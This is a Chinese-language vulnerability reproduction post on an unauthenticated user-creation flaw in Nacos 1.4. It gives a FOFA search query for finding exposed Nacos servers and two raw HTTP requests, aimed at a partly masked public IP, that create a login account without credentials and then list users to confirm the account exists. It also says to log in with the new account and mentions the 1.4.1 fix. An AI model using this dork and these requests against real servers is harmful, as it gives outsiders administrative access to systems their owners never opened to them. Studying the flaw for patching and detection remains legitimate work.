Nacos 认证绕过

Nacos 介绍

Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。 Nacos 是构建以“服务”为中心的现代应用架构 (例如微服务范式、云原生范式) 的服务基础设施。

漏洞成因：

1、未授权访问接口，可以创建登录用户 

2、严格意义上来说，还有一个接口，属于敏感信息泄露漏洞

漏洞影响：

1.4版本

漏洞复现：

FOFA语法：title="nacos"

通过未授权接口创建用户

POST /v1/auth/users?username=test&password=test123 HTTP/1.1
Host: 47.108.000.000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: https://47.108.000.000
Connection: close
Referer: https://47.108.000.000/

通过信息泄漏的接口查询用户是否创建成功

GET /v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
Host: 47.108.000.000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: https://47.108.000.000
Connection: close
Referer: https://47.108.000.000/

漏洞验证

使用创建的系统登录系统

漏洞补丁：

1.4.1 官网已经修复了该漏洞。